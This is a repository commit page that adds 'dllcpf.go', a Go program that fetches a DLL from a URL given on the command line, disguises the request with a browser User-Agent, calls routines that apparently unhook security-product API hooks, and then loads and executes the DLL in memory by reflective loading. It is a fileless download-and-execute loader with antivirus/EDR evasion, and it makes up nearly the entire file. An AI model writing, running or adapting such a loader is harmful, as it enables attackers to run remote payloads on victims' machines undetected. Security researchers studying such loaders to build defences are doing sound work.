~moody/dllcpf

160b30c96485c28be33bc41e79cf39a4f94bc736 — Jacob Moody 7 months ago d9d572a master
Add example go code
1 files changed, 59 insertions(+), 0 deletions(-)

A dllcpf.go
A dllcpf.go => dllcpf.go +59 -0
@@ 0,0 1,59 @@
package main

// #include <stdio.h>
// #include "MemoryModule.h"
// #include "hook.h"
//typedef void (*entryPoint)(void);
//void execentry(entryPoint f) {
//      if(f != NULL)
//		f();
//	else
//		printf("[!!!] Couldn't find handle\n");
//}
import "C"

import (
	"io/ioutil"
	"log"
	"net/http"
	"os"
	"unsafe"
)

var entryPoint string

func LoadFromMemory(b []byte) {
	var f C.entryPoint
	handle := C.MemoryLoadLibrary(unsafe.Pointer(&b[0]), C.size_t(len(b)))
	if handle == nil {
		log.Println("[!!!] Can't load Library")
		return
	}
	f = C.entryPoint(unsafe.Pointer(C.MemoryGetProcAddress(handle, C.CString(entryPoint))))
	C.execentry(f)
}

func main() {
	if len(os.Args) < 3 {
		log.Fatal("Usage: MemoryModule http://path/to/file.dll:8080 entryPoint")
	}
	entryPoint = os.Args[2]
	C.UnhookAll()
	C.SetupPivot()
	client := &http.Client{}
	req, err := http.NewRequest("GET", os.Args[1], nil)
	if err != nil {
		log.Fatal(err)
	}
	req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43")
	resp, err := client.Do(req)
	if err != nil {
		log.Fatal(err)
	}
	b, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		log.Fatal(err)
	}
	resp.Body.Close()
	LoadFromMemory(b)
}